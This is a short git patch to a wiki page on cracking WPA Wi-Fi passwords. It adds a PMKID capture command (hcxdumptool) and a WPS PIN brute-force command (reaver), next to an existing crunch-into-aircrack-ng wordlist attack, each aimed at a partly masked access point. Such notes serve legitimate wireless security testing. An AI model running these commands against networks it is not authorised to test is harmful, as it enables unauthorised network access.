From 68ce8262cd39e97b703eb27e867a82b75583ea45 Mon Sep 17 00:00:00 2001 From: benoit Date: Tue, 27 Oct 2020 11:53:19 +0000 Subject: [PATCH] WPS method --- HowtoCrackWPA.page | 18 +++++++++++++++++- 1 file changed, 17 insertions(+), 1 deletion(-) diff --git a/HowtoCrackWPA.page b/HowtoCrackWPA.page index 9d4701f..e380e1b 100644 --- a/HowtoCrackWPA.page +++ b/HowtoCrackWPA.page @@ -42,4 +42,20 @@ crunch 8 8 0123456789 -s 00000000 | aircrack-ng -w - -b 00:23:B1:82:08:xx \ No newline at end of file +PSK Generator: + +## PMKID method + +``` +hcxdumptool -i wlanX -o PMKID --enable_status=1 +``` + +TODO... + +## WPS method + +AP must have WPS enabled with a PIN. Not PBC, push button. + +``` +reaver -i wlanX -b 00:23:B1:82:84:xx +``` \ No newline at end of file